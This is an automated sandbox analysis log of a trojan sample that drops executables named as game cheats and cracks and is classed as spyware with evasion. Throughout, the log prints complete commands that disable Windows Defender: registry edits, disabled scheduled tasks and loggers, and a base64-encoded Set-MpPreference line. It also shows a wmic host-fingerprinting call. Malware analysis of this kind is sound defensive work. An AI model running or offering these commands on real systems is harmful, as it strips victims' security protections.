                            Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, --------.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                            Source: 52cheatand52rat.exe.0.dr, --------.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 52cheatand52rat.exe.0.dr, --------.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, --------.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, --------.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@113/6@1/1
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\52cheatand52rat.exe.logJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeMutant created: NULL
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeMutant created: \Sessions\1\BaseNamedObjects\kwtxO2R822Z9ihsGdQrR
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2304:120:WilError_03
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeFile created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
                            Source: wKj1CBkbos.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: wKj1CBkbos.exeReversingLabs: Detection: 95%
                            Source: unknownProcess created: C:\Users\user\Desktop\wKj1CBkbos.exe "C:\Users\user\Desktop\wKj1CBkbos.exe"
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeProcess created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe"
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeProcess created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe "C:\Users\user\AppData\Local\Temp\Primordial Crack.exe"
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeProcess created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe"
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeProcess created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeProcess created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe "C:\Users\user\AppData\Local\Temp\Primordial Crack.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeProcess created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /DisableJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /DisableJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: shfolder.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\wKj1CBkbos.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: rtutils.dllJump to behavior
